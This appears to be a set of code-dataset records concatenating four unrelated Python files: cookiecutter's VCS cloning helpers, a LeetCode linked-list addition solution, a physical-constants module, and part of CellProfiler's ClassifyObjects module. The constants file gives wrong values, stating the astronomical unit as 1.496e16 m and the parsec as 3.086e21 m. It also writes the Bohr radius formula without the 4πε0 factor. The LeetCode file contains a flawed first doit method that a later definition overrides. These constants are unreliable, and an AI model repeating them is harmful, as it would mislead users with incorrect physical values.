cloned repository.\n\n :return: repo_dir\n \"\"\"\n return os.path.normpath(os.path.join(clone_to_dir, repo_name))\n\n @classmethod\n def clone(cls, repo_url, checkout, clone_to_dir, repo_dir):\n \"\"\"\n Clone the repository.\n\n :param repo_url: Repository URL\n :param checkout: Branch/Revision to check out\n :param clone_to_dir: Working directory for the VCS\n :param repo_dir: Path of the cloned repository\n :raise subprocess.CalledProcessError: if the VCS returned an error\n \"\"\"\n subprocess.check_output( # nosec\n [cls.cmd, 'clone', repo_url], cwd=clone_to_dir, stderr=subprocess.STDOUT,\n )\n if checkout is not None:\n subprocess.check_output( # nosec\n [cls.cmd, 'checkout', checkout], cwd=repo_dir, stderr=subprocess.STDOUT,\n )\n\n\nclass Git(VCS):\n \"\"\"Git VCS class.\"\"\"\n\n cmd = 'git'\n\n identifiers = ['git']\n protocols = ['git']\n suffixes = ['git']\n\n not_found_errors = ['not found']\n branch_errors = ['error: pathspec']\n\n @staticmethod\n def get_repo_dir(repo_name, clone_to_dir):\n \"\"\"\n Get the path of the cloned repository.\n\n :return: repo_dir\n \"\"\"\n repo_name = repo_name.split(':')[-1].rsplit('.git')[0]\n return os.path.normpath(os.path.join(clone_to_dir, repo_name))\n\n\nclass Hg(VCS):\n \"\"\"Mercury VCS class.\"\"\"\n\n cmd = 'hg'\n\n identifiers = ['hg', 'bitbucket']\n protocols = ['hg']\n suffixes = ['hg']\n\n not_found_errors = ['not found']\n branch_errors = ['unknown revision']\n\n\nclass SVN(VCS):\n \"\"\"Subversion VCS class.\"\"\"\n\n cmd = 'svn'\n\n identifiers = ['svn']\n protocols = ['svn']\n suffixes = []\n\n not_found_errors = ['unable to connect', 'doesn\\'t exist']\n branch_errors = ['no such revision', 'syntax error in revision']\n\n @classmethod\n def match_repo_url(cls, url):\n \"\"\"\n Check if the raw URL input matches SVN.\n\n :param url: Raw url parameter\n :return: VCS.VCS.MatchLevel, repo_url (or None)\n \"\"\"\n level, repo_url = super().match_repo_url(url)\n\n # SVN-specific ssh prefix\n repo_url = re.sub(r'''^ssh://''', 'svn+ssh://', repo_url)\n\n return level, repo_url\n\n @classmethod\n def clone(cls, repo_url, checkout, clone_to_dir, repo_dir):\n \"\"\"\n Clone the repository.\n\n :param repo_url: Repository URL\n :param checkout: Branch/Revision to check out\n :param clone_to_dir: Working directory for the VCS\n :param repo_dir: Path of the cloned repository\n :raise subprocess.CalledProcessError: if the VCS returned an error\n \"\"\"\n # SVN SSH syntax: svn+ssh://private.com/myrepo\n command = [cls.cmd, 'export', repo_url]\n\n if checkout:\n command += ['-r', checkout]\n\n subprocess.check_output( # nosec\n command, cwd=clone_to_dir, stderr=subprocess.STDOUT\n )\n\n\nREPO_TYPES = [\n Git,\n Hg,\n SVN,\n]\n\n\ndef is_repo_url(repo_url):\n \"\"\"Return True if value is a repository URL.\"\"\"\n return any(\n vcs.match_repo_url(repo_url)[0] != VCS.MatchLevel.NONE for vcs in REPO_TYPES\n )\n\n\ndef identify_repo(repo_url):\n \"\"\"\n Determine if `repo_url` should be treated as a URL to a VCS repository.\n\n Repos can be identified by prepending \"hg+\", \"git+\" or \"svn+\"\n to the repo URL.\n\n :param repo_url: Repo URL of unknown type.\n :returns: (VCS, repo_url)\n :raise: UnknownRepoType if repo type could not be identified\n \"\"\"\n implicit_choice = None\n\n for vcs in REPO_TYPES:\n level, url = vcs.match_repo_url(repo_url)\n\n if level == VCS.MatchLevel.EXPLICIT:\n return vcs, url\n elif level == VCS.MatchLevel.IMPLICIT and implicit_choice is None:\n implicit_choice = vcs, url\n\n if implicit_choice is not None:\n return implicit_choice\n\n raise UnknownRepoType\n\n\ndef is_vcs_installed(repo_type):\n \"\"\"\n Check if the version control system for a repo type is installed.\n\n :param repo_type:\n \"\"\"\n return bool(which(repo_type))\n\n\ndef clone(repo_url, checkout=None, clone_to_dir='.', no_input=False):\n \"\"\"\n Clone a repo to the current directory.\n\n :param repo_url: Repo URL of unknown type.\n :param checkout: The branch, tag or commit ID to checkout after clone.\n :param clone_to_dir: The directory to clone to.\n Defaults to the current directory.\n :param no_input: Suppress all user prompts when calling via API.\n :returns: str with path to the new directory of the repository.\n \"\"\"\n # Ensure that clone_to_dir exists\n clone_to_dir = os.path.expanduser(clone_to_dir)\n make_sure_path_exists(clone_to_dir)\n\n # identify the repo_type\n vcs, repo_url = identify_repo(repo_url)\n\n # check that the appropriate VCS for the repo_type is installed\n if not vcs.is_installed():\n msg = \"'{0}' is not installed.\".format(vcs.cmd)\n raise VCSNotInstalled(msg)\n\n repo_url = repo_url.rstrip('/')\n repo_name = os.path.split(repo_url)[1]\n repo_dir = vcs.get_repo_dir(repo_name, clone_to_dir)\n logger.debug('repo_dir is {0}'.format(repo_dir))\n\n if os.path.isdir(repo_dir):\n clone = prompt_and_delete(repo_dir, no_input=no_input)\n else:\n clone = True\n\n if clone:\n try:\n vcs.clone(repo_url, checkout, clone_to_dir, repo_dir)\n except subprocess.CalledProcessError as clone_error:\n output = clone_error.output.decode('utf-8')\n\n # In case of error, print VCS output\n click.echo(\n 'Cloning of {} repository {} returned an error:\\n{}'.format(\n vcs.cmd, repo_url, output\n )\n )\n\n if any(error in output.lower() for error in vcs.not_found_errors):\n raise RepositoryNotFound(\n 'The repository {} could not be found, '\n 'have you made a typo?'.format(repo_url)\n )\n if any(error in output.lower() for error in vcs.branch_errors):\n raise RepositoryCloneFailed(\n 'The {} branch of repository {} could not found, '\n 'have you made a typo?'.format(checkout, repo_url)\n )\n # Raise base subprocess error if SVN error can't be identified\n raise\n\n return repo_dir\n","sub_path":"cookiecutter/vcs.py","file_name":"vcs.py","file_ext":"py","file_size_in_byte":10147,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"9303247","text":"\"\"\"\n\n445. Add Two Numbers II\n\n\nYou are given two non-empty linked lists representing two non-negative integers. The most significant digit comes first and each of their nodes contain a single digit.\nAdd the two numbers and return it as a linked list.\n\nYou may assume the two numbers do not contain any leading zero, except the number 0 itself.\n\nFollow up:\nWhat if you cannot modify the input lists? In other words, reversing the lists is not allowed.\n\nExample:\n\nInput: (7 -> 2 -> 4 -> 3) + (5 -> 6 -> 4)\nOutput: 7 -> 8 -> 0 -> 7\n\n\nSolution\nOverview\nPrerequisites\n\nThe problem is a combination of three basic problems:\n\nReverse Linked List.\n\nAdd Strings - the good problem to refresh textbook digit-by-digit addition algorithm.\n\nAdd Two Numbers - the same problem as the current one, but the digits are stored in reverse order.\n\nTime and Space Complexity To Target\n\nEach list should be parsed at least once, hence the best time complexity we could have is \\mathcal{O}(N_1 + N_2), where N_1 and N_2 are the numbers of elements in the lists.\n\nSpace complexity is more interesting. It's relatively standard for linked list problems not to allocate any data structure but the output list. This way, one could target O(1) space complexity without taking the output list into account.\n\n\"\"\"\n\n\n# Definition for singly-linked list.\nclass ListNode(object):\n def __init__(self, val=0, next=None):\n self.val = val\n self.next = next\n\n\nclass AddTwoNumbers:\n\n def doit(self, l1, l2):\n \"\"\"\n :type l1: ListNode\n :type l2: ListNode\n :rtype: ListNode\n \"\"\"\n l1Stack, l2Stack = [], []\n while l1:\n l1Stack.append(l1.val)\n l1 = l1.next\n while l2:\n l2Stack.append(l2.val)\n l2 = l2.next\n\n prev, head, accum = None, None, 0\n while l1Stack or l2Stack:\n a, b = 0, 0\n if l1Stack:\n a = l1Stack.pop()\n if l2Stack:\n b = l2Stack.pop()\n\n val = (a + b + accum) % 10\n accum = (a + b + accum) / 10\n\n head = ListNode(val)\n head.next = prev\n prev = head\n\n if accum == 1:\n head = ListNode(accum)\n head.next = prev\n\n return head\n\n \"\"\"\n Algorithm\n\n Implement reverseList function.\n\n Reverse both input lists: l1 = reverseList(l1), l2 = reverseList(l2).\n\n Initialize the result list: head = None.\n\n Initialize the carry: carry = 0.\n\n Loop through lists l1 and l2 until you reach both ends.\n\n Set x1 = l1.val if l1 is not finished yet, and x1 = 0 otherwise.\n\n Set x2 = l2.val if l2 is not finished yet, and x2 = 0 otherwise.\n\n Compute the current value: val = (carry + x1 + x2) % 10, and the current carry: carry = (carry + x1 + x2) / 10.\n\n Update the result by adding the current value to front.\n\n Move to the next elements in the lists.\n\n If the carry is not equal to zero, append it to frond of the result list.\n\n Return the result list: return head.\n\n Implementation\n\n Complexity Analysis\n\n Time complexity: O(N_1 + N_2), where N_1 + N_2 is a number of elements in both lists.\n\n Space complexity: O(1) space complexity without taking the output list into account, and O(max(N_1, N_2)) to store the output list.\n \"\"\"\n def doit_reverse(self, l1: ListNode, l2: ListNode) -> ListNode:\n\n def reverseList(head: ListNode) -> ListNode:\n last = None\n while head:\n # keep the next node\n tmp = head.next\n # reverse the link\n head.next = last\n # update the last node and the current node\n last = head\n head = tmp\n\n return last\n\n # reverse lists\n l1 = reverseList(l1)\n l2 = reverseList(l2)\n\n head = None\n carry = 0\n while l1 or l2:\n # get the current values\n x1 = l1.val if l1 else 0\n x2 = l2.val if l2 else 0\n\n # current sum and carry\n val = (carry + x1 + x2) % 10\n carry = (carry + x1 + x2) // 10\n\n # update the result: add to front\n curr = ListNode(val)\n curr.next = head\n head = curr\n\n # move to the next elements in the lists\n l1 = l1.next if l1 else None\n l2 = l2.next if l2 else None\n\n if carry:\n curr = ListNode(carry)\n curr.next = head\n head = curr\n\n return head\n\n def doit_(self, l1: ListNode, l2: ListNode) -> ListNode:\n\n # find the length of both lists\n n1 = n2 = 0\n curr1, curr2 = l1, l2\n while curr1:\n curr1 = curr1.next\n n1 += 1\n while curr2:\n curr2 = curr2.next\n n2 += 1\n\n # parse both lists\n # and sum the corresponding positions\n # without taking carry into account\n # 3->3->3 + 7->7 --> 3->10->10 --> 10->10->3\n curr1, curr2 = l1, l2\n head = None\n while n1 > 0 and n2 > 0:\n val = 0\n if n1 >= n2:\n val += curr1.val\n curr1 = curr1.next\n n1 -= 1\n if n1 < n2:\n val += curr2.val\n curr2 = curr2.next\n n2 -= 1\n\n # update the result: add to front\n curr = ListNode(val)\n curr.next = head\n head = curr\n\n # take the carry into account\n # to have all elements to be less than 10\n # 10->10->3 --> 0->1->4 --> 4->1->0\n curr1, head = head, None\n carry = 0\n while curr1:\n # current sum and carry\n val = (curr1.val + carry) % 10\n carry = (curr1.val + carry) // 10\n\n # update the result: add to front\n curr = ListNode(val)\n curr.next = head\n head = curr\n\n # move to the next elements in the list\n curr1 = curr1.next\n\n # add the last carry\n if carry:\n curr = ListNode(carry)\n curr.next = head\n head = curr\n\n return head\n\n def doit(self, l1: ListNode, l2: ListNode) -> ListNode:\n\n n1, cur1, n2, cur2 = 0, l1, 0, l2\n while cur1:\n n1 += 1\n cur1 = cur1.next\n\n while cur2:\n n2 += 1\n cur2 = cur2.next\n\n head = None\n cur1, cur2 = l1, l2\n while n1 > 0 and n2 > 0:\n val = 0\n if n1 >= n2:\n val = cur1.val\n cur1 = cur1.next\n n1 -= 1\n\n if n2 > n1:\n val += cur2.val\n cur2 = cur2.next\n n2 -= 1\n\n cur = ListNode(val)\n cur.next = head\n head = cur\n\n carry = 0\n curr1, head = head, ListNode()\n\n while curr1:\n carry, curr1.val = divmod(curr1.val + carry, 10)\n\n next = curr1.next\n head.next, curr1.next = curr1, head.next\n curr1 = next\n\n if carry:\n c = ListNode(1)\n head.next, c.next = c, head.next\n\n return head.next\n\n\n","sub_path":"PythonLeetcode/leetcodeM/445_AddTwoNumbersII.py","file_name":"445_AddTwoNumbersII.py","file_ext":"py","file_size_in_byte":7278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"528205961","text":"from math import pi\n#\tPhysical Constants in MKS units\nVersion = '1.1.0'\nR = 8.3144621\t\t\t\t\t\t\t\t# Universal Gas Constant (J/K/?mol)\nc = 2.99792458e8\t\t\t\t\t\t\t# Speed of Light in Vacuum (m/s)\nG = 6.674e-11\t\t\t\t\t\t\t\t# Gravitational Constant (J m kg^-2)\nh = 6.62608e-34\t\t\t\t\t\t\t\t# Planck's Constant (J s)\nhbar = h/(2*pi)\t\t\t\t\t\t\t\t# Planck bar (erg s)\nk = 1.38066e-23\t\t\t\t\t\t\t\t# Boltzmann constant (J/K)\npe = 1.602e-19\t\t\t\t\t\t\t\t# Proton Charge (coulomb)\nemass = 9.10939e-31\t\t\t\t\t\t\t# Electron Mass (kg)\npmass = 1.67262e-27\t\t\t\t\t\t\t# Proton Mass (kg)\nSBC = (pi**2)*(k**4)/(60*(c**2)*(hbar**3)); # Stefan-Boltzmann Constant (J s^-1 m^-2 K^-4)\nAvo = 6.02e23\t\t\t\t\t\t\t\t# Avogadro (atoms/mol)\nRalpha = (hbar**2)/(emass*(pe**2));\t\t\t# Bohr Radius (m)\n\n#\tUnit Conversion\t#\nAU = 1.496e16\t\t\t\t\t\t\t\t# Astronomical Unit (m)\npc = 3.086e21\t\t\t\t\t\t\t\t# Parsec (m)\n\n#\tOther\t#\nHF_Water = 334000\t\t\t\t\t\t\t# Heat of Fusion, Water, J/kg engineeringtoolbox.com","sub_path":"Other_Essentials/MKSConstants.py","file_name":"MKSConstants.py","file_ext":"py","file_size_in_byte":905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"619710668","text":"__doc__ = \"\"\"\\\nClassifyObjects\n===============\n\n**ClassifyObjects** classifies objects into different classes according\nto the value of measurements you choose.\n\nThis module classifies objects into a number of different bins according\nto the value of a measurement (e.g., by size, intensity, shape). It\nreports how many objects fall into each class as well as the percentage\nof objects that fall into each class. The module asks you to select the\nmeasurement feature to be used to classify your objects and specify the\nbins to use. It also requires you to have run a measurement or\n**CalculateMath** previous to this module in the pipeline so that the\nmeasurement values can be used to classify the objects.\n\nThere are two flavors of classification:\n\n- The first classifies each object according to the measurements you\n choose and assigns each object to one class per measurement. You may\n specify more than two classification bins per measurement.\n- The second classifies each object according to two measurements and\n two threshold values. The module classifies each object once per\n measurement resulting in four possible object classes. The module\n then stores one measurement per object, based on the object’s class.\n\nNote that objects without a measurement are not counted as belonging in\na classification bin and will not show up in the output image (shown in\nthe module display window); in the object classification they will have\na value of False for all bins. However, they are still counted in the\ntotal number of objects and hence are reflected in the classification\npercentages.\n \n|\t\t\n \t\t\n============ ============ ===============\t\t\nSupports 2D? Supports 3D? Respects masks?\t\t\n============ ============ ===============\t\t\nYES NO NO\t\t\n============ ============ ===============\t\t\n \t\t\nSee also\t\t\n^^^^^^^^\t\t\n \t\t\nSee also **CalculateMath** and any of the modules in the **Measure**\tcategory.\t\t\n \nMeasurements made by this module\n^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n\n- **Image measurements:**\n\n - *NumObjectsPerBin:* The number of objects that are classified into\n each bin.\n - *PctObjectsPerBin:* The percentage of total objects that are\n classified into each bin.\n\n- **Object measurements:**\n\n - Single measurement: Classification (true/false) of the\n N\\ :sup:`th` bin for the M\\ :sup:`th` measurement.\n - Two measurement: Classification (true/false) of the 1\\ :sup:`st`\n measurement versus the 2\\ :sup:`nd` measurement binned into bins\n above (“high”) and below (“low”) the cutoff.\n\"\"\"\n\nimport functools\n\nimport numpy\nfrom cellprofiler_core.constants.measurement import COLTYPE_FLOAT\nfrom cellprofiler_core.constants.measurement import COLTYPE_INTEGER\nfrom cellprofiler_core.constants.measurement import IMAGE\nfrom cellprofiler_core.image import Image\nfrom cellprofiler_core.module import Module\nfrom cellprofiler_core.preferences import get_default_colormap\nfrom cellprofiler_core.setting import Binary\nfrom cellprofiler_core.setting import Divider\nfrom cellprofiler_core.setting import HiddenCount\nfrom cellprofiler_core.setting import Measurement\nfrom cellprofiler_core.setting import SettingsGroup\nfrom cellprofiler_core.setting import ValidationError\nfrom cellprofiler_core.setting.choice import Choice\nfrom cellprofiler_core.setting.do_something import DoSomething\nfrom cellprofiler_core.setting.do_something import RemoveSettingButton\nfrom cellprofiler_core.setting.text import Alphanumeric\nfrom cellprofiler_core.setting.text import Float\nfrom cellprofiler_core.setting.text import ImageName\nfrom cellprofiler_core.setting.text import Integer\nfrom cellprofiler_core.setting.text import LabelName\nfrom cellprofiler_core.setting.text import Text\n\nBY_SINGLE_MEASUREMENT = \"Single measurement\"\nBY_TWO_MEASUREMENTS = \"Pair of measurements\"\nTM_MEAN = \"Mean\"\nTM_MEDIAN = \"Median\"\nTM_CUSTOM = \"Custom\"\n\nBC_EVEN = \"Evenly spaced bins\"\nBC_CUSTOM = \"Custom-defined bins\"\n\nM_CATEGORY = \"Classify\"\nF_PCT_PER_BIN = \"PctObjectsPerBin\"\nF_NUM_PER_BIN = \"NumObjectsPerBin\"\n\n\nclass ClassifyObjects(Module):\n category = \"Object Processing\"\n module_name = \"ClassifyObjects\"\n variable_revision_number = 2\n\n def create_settings(self):\n \"\"\"Create the settings for the module\n\n Create the settings for the module during initialization.\n \"\"\"\n self.contrast_choice = Choice(\n \"Make each classification decision on how many measurements?\",\n [BY_SINGLE_MEASUREMENT, BY_TWO_MEASUREMENTS],\n doc=\"\"\"\\\nThis setting controls how many measurements are used to make a\nclassifications decision for each object:\n\n- *%(BY_SINGLE_MEASUREMENT)s:* Classifies each object based on a\n single measurement.\n- *%(BY_TWO_MEASUREMENTS)s:* Classifies each object based on a pair\n of measurements taken together (that is, an object must meet two\n criteria to belong to a class).\n\"\"\"\n % globals(),\n )\n\n ############### Single measurement settings ##################\n #\n # A list holding groupings for each of the single measurements\n # to be done\n #\n self.single_measurements = []\n #\n # A count of # of measurements\n #\n self.single_measurement_count = HiddenCount(self.single_measurements)\n #\n # Add one single measurement to start off\n #\n self.add_single_measurement(False)\n #\n # A button to press to get another measurement\n #\n self.add_measurement_button = DoSomething(\n \"\", \"Add another classification\", self.add_single_measurement\n )\n #\n ############### Two-measurement settings #####################\n #\n # The object for the contrasting method\n #\n self.object_name = LabelName(\n \"Select the object name\",\n \"None\",\n doc=\"\"\"\\\nChoose the object that you want to measure from the list. This should be\nan object created by a previous module such as\n**IdentifyPrimaryObjects**, **IdentifySecondaryObjects**, **IdentifyTertiaryObjects**, or **Watershed**\n\"\"\",\n )\n\n #\n # The two measurements for the contrasting method\n #\n def object_fn():\n return self.object_name.value\n\n self.first_measurement = Measurement(\n \"Select the first measurement\",\n object_fn,\n doc=\"\"\"\\\n*(Used only if using a pair of measurements)*\n\nChoose a measurement made on the above object. This is the first of two\nmeasurements that will be contrasted together. The measurement should be\none made on the object in a prior module.\n\"\"\",\n )\n\n self.first_threshold_method = Choice(\n \"Method to select the cutoff\",\n [TM_MEAN, TM_MEDIAN, TM_CUSTOM],\n doc=\"\"\"\\\n*(Used only if using a pair of measurements)*\n\nObjects are classified as being above or below a cutoff value for a\nmeasurement. You can set this cutoff threshold in one of three ways:\n\n- *%(TM_MEAN)s*: At the mean of the measurement’s value for all\n objects in the image cycle.\n- *%(TM_MEDIAN)s*: At the median of the measurement’s value for all\n objects in the image set.\n- *%(TM_CUSTOM)s*: You specify a custom threshold value.\n\"\"\"\n % globals(),\n )\n\n self.first_threshold = Float(\n \"Enter the cutoff value\",\n 0.5,\n doc=\"\"\"\\\n*(Used only if using a pair of measurements)*\n\nThis is the cutoff value separating objects in the two classes.\"\"\",\n )\n\n self.second_measurement = Measurement(\n \"Select the second measurement\",\n object_fn,\n doc=\"\"\"\\\n*(Used only if using a pair of measurements)*\n\nSelect a measurement made on the above object. This is\nthe second of two measurements that will be contrasted together.\nThe measurement should be one made on the object in a prior\nmodule.\"\"\",\n )\n\n self.second_threshold_method = Choice(\n \"Method to select the cutoff\",\n [TM_MEAN, TM_MEDIAN, TM_CUSTOM],\n doc=\"\"\"\\\n*(Used only if using a pair of measurements)*\n\nObjects are classified as being above or below a cutoff value for a\nmeasurement. You can set this cutoff threshold in one of three ways:\n\n- *%(TM_MEAN)s:* At the mean of the measurement’s value for all\n objects in the image cycle.\n- *%(TM_MEDIAN)s:* At the median of the measurement’s value for all\n objects in the image set.\n- *%(TM_CUSTOM)s:* You specify a custom threshold value.\n\"\"\"\n % globals(),\n )\n\n self.second_threshold = Float(\n \"Enter the cutoff value\",\n 0.5,\n doc=\"\"\"\\\n*(Used only if using a pair of measurements)*\n\nThis is the cutoff value separating objects in the two classes.\"\"\",\n )\n\n self.wants_custom_names = Binary(\n \"Use custom names for the bins?\",\n False,\n doc=\"\"\"\\\n*(Used only if using a pair of measurements)*\n\nSelect \"*Yes*\" if you want to specify the names of each bin\nmeasurement.\n\nSelect \"*No*\" to create names based on the measurements. For instance,\nfor “Intensity_MeanIntensity_Green” and\n“Intensity_TotalIntensity_Blue”, the module generates measurements\nsuch as\n“Classify_Intensity_MeanIntensity_Green_High_Intensity_TotalIntensity_Low”.\n\"\"\"\n % globals(),\n )\n\n self.low_low_custom_name = Alphanumeric(\n \"Enter the low-low bin name\",\n \"low_low\",\n doc=\"\"\"\\\n*(Used only if using a pair of measurements)*\n\nName of the measurement for objects that fall below the threshold for\nboth measurements.\n\"\"\",\n )\n\n self.low_high_custom_name = Alphanumeric(\n \"Enter the low-high bin name\",\n \"low_high\",\n doc=\"\"\"\\\n*(Used only if using a pair of measurements)*\n\nName of the measurement for objects whose\nfirst measurement is below threshold and whose second measurement\nis above threshold.\n\"\"\",\n )\n\n self.high_low_custom_name = Alphanumeric(\n \"Enter the high-low bin name\",\n \"high_low\",\n doc=\"\"\"\\\n*(Used only if using a pair of measurements)*\n\nName of the measurement for objects whose\nfirst measurement is above threshold and whose second measurement\nis below threshold.\"\"\",\n )\n\n self.high_high_custom_name = Alphanumeric(\n \"Enter the high-high bin name\",\n \"high_high\",\n doc=\"\"\"\\\n*(Used only if using a pair of measurements)*\n\nName of the measurement for objects that\nare above the threshold for both measurements.\"\"\",\n )\n\n self.wants_image = Binary(\n \"Retain an image of the classified objects?\",\n False,\n doc=\"\"\"\\\nSelect \"*Yes*\" to retain the image of the objects color-coded\naccording to their classification, for use later in the pipeline (for\nexample, to be saved by a **SaveImages** module).\n\"\"\"\n % globals(),\n )\n\n self.image_name = ImageName(\n \"Enter the image name\",\n \"None\",\n doc=\"\"\"\\\n*(Used only if the classified object image is to be retained for later use in the pipeline)*\n\nEnter the name to be given to the classified object image.\"\"\",\n )\n\n def add_single_measurement(self, can_delete=True):\n \"\"\"Add a single measurement to the group of single measurements\n\n can_delete - True to include a \"remove\" button, False if you're not\n allowed to remove it.\n \"\"\"\n group = SettingsGroup()\n if can_delete:\n group.append(\"divider\", Divider(line=True))\n\n group.append(\n \"object_name\",\n LabelName(\n \"Select the object to be classified\",\n \"None\",\n doc=\"\"\"\\\nThe name of the objects to be classified. You can choose from objects\ncreated by any previous module. See **IdentifyPrimaryObjects**,\n**IdentifySecondaryObjects**, **IdentifyTertiaryObjects**, or **Watershed**\n\"\"\",\n ),\n )\n\n def object_fn():\n return group.object_name.value\n\n group.append(\n \"measurement\",\n Measurement(\n \"Select the measurement to classify by\",\n object_fn,\n doc=\"\"\"\\\n*(Used only if using a single measurement)*\n\nSelect a measurement made by a previous module. The objects will be\nclassified according to their values for this measurement.\n\"\"\",\n ),\n )\n\n group.append(\n \"bin_choice\",\n Choice(\n \"Select bin spacing\",\n [BC_EVEN, BC_CUSTOM],\n doc=\"\"\"\\\n*(Used only if using a single measurement)*\n\nSelect how you want to define the spacing of the bins. You have the\nfollowing options:\n\n- *%(BC_EVEN)s:* Choose this if you want to specify bins of equal\n size, bounded by upper and lower limits. If you want two bins, choose\n this option and then provide a single threshold when asked.\n- *%(BC_CUSTOM)s:* Choose this option to create the indicated number\n of bins at evenly spaced intervals between the low and high\n threshold. You also have the option to create bins for objects that\n fall below or above the low and high threshold.\n\"\"\"\n % globals(),\n ),\n )\n\n group.append(\n \"bin_count\",\n Integer(\n \"Number of bins\",\n 3,\n minval=1,\n doc=\"\"\"\\\n*(Used only if using a single measurement)*\n\nThis is the number of bins that will be created between\nthe low and high threshold\"\"\",\n ),\n )\n\n group.append(\n \"low_threshold\",\n Float(\n \"Lower threshold\",\n 0,\n doc=\"\"\"\\\n*(Used only if using a single measurement and \"%(BC_EVEN)s\" selected)*\n\nThis is the threshold that separates the lowest bin from the others. The\nlower threshold, upper threshold, and number of bins define the\nthresholds of bins between the lowest and highest.\n\"\"\"\n % globals(),\n ),\n )\n\n group.append(\n \"wants_low_bin\",\n Binary(\n \"Use a bin for objects below the threshold?\",\n False,\n doc=\"\"\"\\\n*(Used only if using a single measurement)*\n\nSelect \"*Yes*\" if you want to create a bin for objects whose values\nfall below the low threshold. Select \"*No*\" if you do not want a bin\nfor these objects.\n\"\"\"\n % globals(),\n ),\n )\n\n group.append(\n \"high_threshold\",\n Float(\n \"Upper threshold\",\n 1,\n doc=\"\"\"\\\n*(Used only if using a single measurement and \"%(BC_EVEN)s\" selected)*\n\nThis is the threshold that separates the last bin from the others. Note\nthat if you would like two bins, you should select \"*%(BC_CUSTOM)s*\".\n\"\"\"\n % globals(),\n ),\n )\n\n group.append(\n \"wants_high_bin\",\n Binary(\n \"Use a bin for objects above the threshold?\",\n False,\n doc=\"\"\"\\\n*(Used only if using a single measurement)*\n\nSelect \"*Yes*\" if you want to create a bin for objects whose values\nare above the high threshold.\n\nSelect \"*No*\" if you do not want a bin for these objects.\n\"\"\"\n % globals(),\n ),\n )\n\n group.append(\n \"custom_thresholds\",\n Text(\n \"Enter the custom thresholds separating the values between bins\",\n \"0,1\",\n doc=\"\"\"\\\n*(Used only if using a single measurement and \"%(BC_CUSTOM)s\" selected)*\n\nThis setting establishes the threshold values for the bins. You should\nenter one threshold between each bin, separating thresholds with commas\n(for example, *0.3, 1.5, 2.1* for four bins). The module will create one\nmore bin than there are thresholds.\n\"\"\"\n % globals(),\n ),\n )\n\n group.append(\n \"wants_custom_names\",\n Binary(\n \"Give each bin a name?\",\n False,\n doc=\"\"\"\\\n*(Used only if using a single measurement)*\n\nSelect \"*Yes*\" to assign custom names to bins you have specified.\n\nSelect \"*No*\" for the module to automatically assign names based on\nthe measurements and the bin number.\n\"\"\"\n % globals(),\n ),\n )\n\n group.append(\n \"bin_names\",\n Text(\n \"Enter the bin names separated by commas\",\n \"None\",\n doc=\"\"\"\\\n*(Used only if \"Give each bin a name?\" is checked)*\n\nEnter names for each of the bins, separated by commas.\nAn example including three bins might be *First,Second,Third*.\"\"\",\n ),\n )\n\n group.append(\n \"wants_images\",\n Binary(\n \"Retain an image of the classified objects?\",\n False,\n doc=\"\"\"\\\nSelect \"*Yes*\" to keep an image of the objects which is color-coded\naccording to their classification, for use later in the pipeline (for\nexample, to be saved by a **SaveImages** module).\n\"\"\"\n % globals(),\n ),\n )\n\n group.append(\n \"image_name\",\n ImageName(\n \"Name the output image\",\n \"ClassifiedNuclei\",\n doc=\"\"\"Enter the name to be given to the classified object image.\"\"\",\n ),\n )\n\n group.can_delete = can_delete\n\n def number_of_bins():\n \"\"\"Return the # of bins in this classification\"\"\"\n if group.bin_choice == BC_EVEN:\n value = group.bin_count.value\n else:\n value = len(group.custom_thresholds.value.split(\",\")) - 1\n if group.wants_low_bin:\n value += 1\n if group.wants_high_bin:\n value += 1\n return value\n\n group.number_of_bins = number_of_bins\n\n def measurement_name():\n \"\"\"Get the measurement name to use inside the bin name\n\n Account for conflicts with previous measurements\n \"\"\"\n measurement_name = group.measurement.value\n other_same = 0\n for other in self.single_measurements:\n if id(other) == id(group):\n break\n if other.measurement.value == measurement_name:\n other_same += 1\n if other_same > 0:\n measurement_name += str(other_same)\n return measurement_name\n\n def bin_feature_names():\n \"\"\"Return the feature names for each bin\"\"\"\n if group.wants_custom_names:\n return [name.strip() for name in group.bin_names.value.split(\",\")]\n return [\n \"_\".join((measurement_name(), \"Bin_%d\" % (i + 1)))\n for i in range(number_of_bins())\n ]\n\n group.bin_feature_names = bin_feature_names\n\n def validate_group():\n bin_name_count = len(bin_feature_names())\n bin_count = number_of_bins()\n if bin_count < 1:\n bad_setting = (\n group.bin_count\n if group.bin_choice == BC_EVEN\n else group.custom_thresholds\n )\n raise ValidationError(\n \"You must have at least one bin in order to take measurements. \"\n \"Either add more bins or ask for bins for objects above or below threshold\",\n bad_setting,\n )\n if bin_name_count != number_of_bins():\n raise ValidationError(\n \"The number of bin names (%d) does not match the number of bins (%d).\"\n % (bin_name_count, bin_count),\n group.bin_names,\n )\n for bin_feature_name in bin_feature_names():\n Alphanumeric.validate_alphanumeric_text(\n bin_feature_name, group.bin_names, True\n )\n if group.bin_choice == BC_CUSTOM:\n try:\n [float(x.strip()) for x in group.custom_thresholds.value.split(\",\")]\n except ValueError:\n raise ValidationError(\n \"Custom thresholds must be a comma-separated list \"\n 'of numbers (example: \"1.0, 2.3, 4.5\")',\n group.custom_thresholds,\n )\n elif group.bin_choice == BC_EVEN:\n if group.low_threshold.value >= group.high_threshold.value:\n raise ValidationError(\n \"Lower Threshold must be less than Upper Threshold\",\n group.low_threshold,\n )\n\n group.validate_group = validate_group\n\n if can_delete:\n group.remove_settings_button = RemoveSettingButton(\n \"\", \"Remove this classification\", self.single_measurements, group\n )\n self.single_measurements.append(group)\n\n def settings(self):\n result = [self.contrast_choice, self.single_measurement_count]\n result += functools.reduce(\n lambda x, y: x + y,\n [group.pipeline_settings() for group in self.single_measurements],\n )\n result += [\n self.object_name,\n self.first_measurement,\n self.first_threshold_method,\n self.first_threshold,\n self.second_measurement,\n self.second_threshold_method,\n self.second_threshold,\n self.wants_custom_names,\n self.low_low_custom_name,\n self.low_high_custom_name,\n self.high_low_custom_name,\n self.high_high_custom_name,\n self.wants_image,\n self.image_name,\n ]\n return result\n\n def visible_settings(self):\n result = [self.contrast_choice]\n if self.contrast_choice == BY_TWO_MEASUREMENTS:\n #\n # Visible settings if there are two measurements\n #\n result += [self.object_name]\n for measurement_setting, threshold_method_setting, threshold_setting in (\n (\n self.first_measurement,\n 